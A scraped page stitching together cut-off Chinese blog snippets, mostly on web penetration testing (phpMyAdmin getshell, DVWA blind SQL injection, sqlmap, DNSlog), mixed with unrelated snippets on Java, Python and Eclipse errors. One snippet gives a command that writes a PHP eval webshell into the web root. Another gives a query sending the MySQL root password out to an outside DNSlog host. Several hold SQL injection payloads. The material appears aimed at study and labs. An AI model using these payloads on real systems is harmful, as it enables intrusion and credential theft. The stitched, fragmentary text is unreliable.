phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-priv没设置为空或指定的文件夹可以利用,写入木马,select"<?php @eval($_POST[s]);?>" into outfile "var/www/html/xx.php" 利用日志文件getshell,mysql大于5.0版本会创建日志文件,…
DVWA-基于布尔值的盲注与基于时间的盲注学习笔记 基于布尔值的盲注 一.DVWA分析 将DVWA的级别设置为low 1.分析源码,可以看到对参数没有做任何过滤,但对sql语句查询的返回的结果做了改变,此次不能简单的通过回显的值来进行一般的注入了,可以通过bool盲注或者基于时间的注入. 2.判断sql是否存在注入,以及注入的类型 下图说明存在字符型注入 3.猜解当前数据库名 3.1猜解当前数据库的长度 1' and  length(database())=4 # 3.2猜解数据库的名称 1'…
SQL注入之盲注 实战过程中,大多情况下很少会有回显,这个时候就要去使用盲注技术 盲注,Blind SQL Injection,听这名字就感觉整个过程就是一个盲目的过程 当注入时,没有任何提示的时候,就改用上盲注 常见函数 ascii(str) str是一个字符串参数,返回值为其最左侧字符的ascii码.通过它,我们才能确定特定的字符. substr(str,start,len) 这个函数是取str中从下标start开始的,长度为len的字符串.通常在盲注中用于取出单个字符,交给ascii函数来…
小编相信很多新手都会遇到以下几个问题 1.零基础想学渗透怎么入手? 2.学习web渗透需要从哪里开始? 这让很多同学都处于迷茫状态而迟迟不下手,小编就在此贴给大家说一下web渗透的学习路线,希望对大家有帮助 同时本博客也会按照学习路线推出渗透学习教学教程,希望大家能多多支持 本博客地址:http://www.cnblogs.com/cnhacker/ Web安全相关概念熟悉基本概念(SQL注入.上传.XSS.CSRF.一句话木马等). 通过关键字(SQL注入.上传.XSS.CSRF.一句话木马等…
sqlmap参数--file-read,从数据库服务器中读取文件--file-write,--file-dest,把文件上传到数据库服务器中 dnslog平台的学习和它在盲注中的应用1,判断注入点2,测试网站对DNSlog提供的url是否解析SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'))…
代理查询网站:hidemyass(隐藏我的屁股) HTTrack:HTTrack是一个免费和易用的离线浏览工具(浏览器),它可以允许你下载整个WWW网站至本地目录,并且通过遍历网站目录获取HTML,图片和其他文件,是安全渗透测试和居家旅行必备软件.…
具体出处:https://www.zhihu.com/question/35542990 我只是一个计算机相关专业毕业的,已经掌握了基础的C#并开发过.net的.目前突然心血来潮对unity3D有兴趣,就学习下. 推荐学习视频网页:http://www.taikr.com/ 虽然要钱不过有免费的. http://study.163.com/course/introduction.htm?courseId=1002818014  游戏特效 - Unity3d特效基础 - 入门到精通(免费)  ht…
    常规WEB渗透测试漏洞描述及修复 --转自:http://www.51testing.com/html/92/n-3723692.html (1). Apache样例文件泄漏 漏洞描述 apache一些样例文件没有删除,可能存在cookie.session伪造,进行后台登录操作 修复建议 1.删除样例文件 2.对apache中web.xml进行相关设置 (2)弱口令 漏洞描述 由于系统中存在有弱口令,导致攻击者通过弱口令可轻松登录系统中,从而进行下一步的攻击,如上传webshell,获取…
一侦查 研究如何收集有关目标的情报,比如开发那些端口用来通信,托管在哪里,提供给客户的服务类型等. 交付内容应该包括需要攻击的所有目标资产清单,与那些资产关联的应用,使用的服务以及可能的资产所有者. 侦查目标: 找出目标 定义应用和商业用途 找出系统类型 找出可用端口 找出运行的服务 对信息进行社会工程 记录发现的内容 二目标测试 测试出目标的薄弱环节 找出容易受攻击的系统,并确定起优先级 讲易受攻击的系统和资产所有者进行映射 记录发现的内容 三漏洞利用 目标 漏洞利用 拿到权限 抓取非授权数据…
1.apt-get install python-nmap 2.apt-get install python-setuptools 正在读取软件包列表... 完成 正在分析软件包的依赖关系树       正在读取状态信息... 完成       python-setuptools 已经是最新的版本. python-setuptools 已设置为手动安装. 下列软件包是自动安装的并且现在不需要了:   libct4 libmapi0 libmapiadmin0 libocpf0 libsubuni…
.4. HTTP标准 1.4.1. 报文格式 1.4.1.1. 请求报文格式 <method><request-URL><version> <headers> <entity-body> 1.4.1.2. 响应报文格式 <version><status><reason-phrase> <headers> <entity-body> 1.4.1.3.字段解释 method HTTP动词 常…
给网页中的所有<p>元素添加onclick事件 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <…
一.equals方法介绍 1.1.通过下面的例子掌握equals的用法 1 package cn.galc.test; 2 3 public class TestEquals { 4 public static void main(String[] args) { 5 /** 6 * 这里使用构造方法Cat()在堆内存里面new出了两只猫, 7 * 这两只猫的color,weight,height都是一样的, 8 * 但c1和c2却永远不会相等,这是因为c1和c2分别为堆内存里面两只猫的引用对象…
一.equals方法介绍 1.1.通过下面的例子掌握equals的用法 package cn.galc.test; public class TestEquals { public static void main(String[] args) { /** * 这里使用构造方法Cat()在堆内存里面new出了两只猫, * 这两只猫的color,weight,height都是一样的, * 但c1和c2却永远不会相等,这是因为c1和c2分别为堆内存里面两只猫的引用对象, * 里面装着可以找到这两只猫…
接下来这个为啥要叫魔法方法呢,额,这个嘛我是跟小甲鱼的视频取的名字一样的,因为会讲比较多杂的东西,有... 魔法方法详细阅读地址:http://bbs.fishc.com/thread-48793-1-1.html 啥是魔法方法呢? 魔法方法是“面向对象”python的一切,一般被双下划线包围着,例如__init__(self[,...]): __init__这个是一个构造函数,在类里面一般用于属性初始化,返回值为Null,不要在__init__函数下return值. 我们在实例化对象的时候,大…
package FunDemo; import java.io.File; import java.io.IOException; import java.util.Arrays; public class Demo { public static void main(String[] args) throws Exception { /* * 访问文件名相关的方法: * String getName():返回此File对象所表示的文件名或路径名(如果是路径,则返回最后一级子路径名) * Str…
Python的异常 异常的层次结构: BaseException [所有异常的基类] +-- SystemExit [解释器请求退出] +-- KeyboardInterrupt [用户中断执行(通常是输入^C)] +-- GeneratorExit [生成器(generator)发生异常来通知退出] +-- Exception [常规错误的基类] +-- StopIteration [迭代器没有更多的值] +-- StopAsyncIteration +-- ArithmeticError […
在ubuntu中启动eclipse报错:(Eclipse:15978): GLib-GIO-CRITICAL **: g_dbus_connection_get_unique_name: assertion 'G_IS_DBUS_CONNECTION (connection)' failed. 出现错误原因:出现这个错误是因为环境变量配置出现了错误,虽然在安装JDK的时候在/etc/profile中配置了环境变量,但是并没有配置~/.profile. 首先先说明一下/etc/profile ~/…
报错1 java.io.IOException: Could not locate executable null\bin\winutils.exe in the Hadoop binaries. 解决办法 下载winutils.exe文件,将其放到hadoop目录hadoop-2.6.0\bin下 然后配置HADOOP_HOME和并配置path就可以了,比如我的是: HADOOP_HOME为 D:\bigdata_software\hadoop-2.6.0 path为 HADOOP_HOME\…
错误提示: #1291 – Column 'nature' has duplicated value '婆婆妈妈' in SET SQL 查询: -- -- 导出表中的数据 `dede_member_operation` -- -- -------------------------------------------------------- -- -- 表的结构 `dede_member_person` -- CREATE TABLE `dede_member_person` ( MySQL…
遇到这种情况,如果语法没有错误,那就可能是你的eclipse在耍你!!! 怎么弄呢,重新建立一个文件,把原来的代码复制到新的文件中就ok啦!不用谢我,我叫雷锋…
Web安全攻防 渗透测试实战指南   学习笔记 (二)   第二章  漏洞环境及实践  …
本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教. 另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用. 0x00.介绍一下本人对盲注的总结. 盲注就是在没有回显的结果下进行推断性的注入,这样我们有几种办法来注入: 1.根据页面正常与否判断payload是否正确(基于bool的盲注) 2.想办法让页面产生回显(个人感觉这个比较好用)(基于报错的盲注) 3.利用页面的延迟反应判断payload是否正确(基于延时的盲注) 0x01.盲注的大纲 1.布尔…
一.简介 SQLmap 是一款用 Python 编写的开源渗透测试工具,用来自动检测和利用 SQL 注入漏洞. 二.Windows 下安装 2.1 安装 Python 环境 注:Python 3.0会出错 , Python>=2.6  且 <3.0 官网地址:https://www.python.org 按步骤下载安装完成后,在 PATH 环境变量的系统变量中加入 Python 路径. 2.2 安装 SQLmap GitHub下载:https://github.com/sqlmapprojec…
sqlmap简介 sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限. 它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令. 它支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP…
简单来说:一个用来做sql注入攻击的工具 安装 1,下载sqlmap.zip,下载环境: 打开sqlmap官网https://github.com/sqlmapproject/sqlmap/ :下载python-2.7.17.amd64.msi 2.配置环境变量: (控制面板->系统和安全->系统->高级系统设置->环境变量)找到path 新建黏贴python地址 (不明白的话可以自行百度,这就不细说安装了) sqlmap简介 sqlmap支持五种不同的注入模式: 1.基于布尔的盲…
5/27 基于布尔的盲注 我连题目都看不懂555,先去补充一点知识.https://blog.csdn.net/weixin_40709439/article/details/81355856 返回的true或者false 构造payload让信息通过错误提示回显出来,一种类型(其它的暂时不怎么了解)是先报字段数,再利用后台数据库报错机制回显(跟一般的报错区别是,一般的报错注入是爆出字段数后,在此基础通过正确的查询语句,使结果回显到页面: 后者是在爆出字段数的基础上使用能触发SQL报错机制的注入…
写在前面: 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句,虽然注入并不是什么新技术了.但是数据库注入漏洞依然困扰着每一个安全厂商,也鞭策着每一个安全从业者不断前进. 正文: 首先来简单介绍一下盲注,盲注是不能通过直接显示的途径来获取数据库数据的方法.在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同).一般情况下,盲注可分为三类. Booleanbase Timebase Errorbase 其中第一类Boolean就是我们最常接触到的普通…
Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23 http://192.168.91.139/sqli/example1.php?name=root' uni…
SQLmap介绍 sqlmap是一个由python语言编写的开源的渗透测试工具,它主要是检测SQL注入漏洞,是一款功能强大的SQL漏洞检测利用工具. 他可以检测的数据库有:access.msSQL.MySQL.oracle.postgresql.SQLserver.db2.sqlite等 可以进行SQL盲注.union查询.显错注入.延迟注入.post注入.cookie注入等,宽字节注入 其他功能:执行命令.列举用户.检测权限.自动破解.数据导出等功能,过waf SQLmap安装 需要pytho…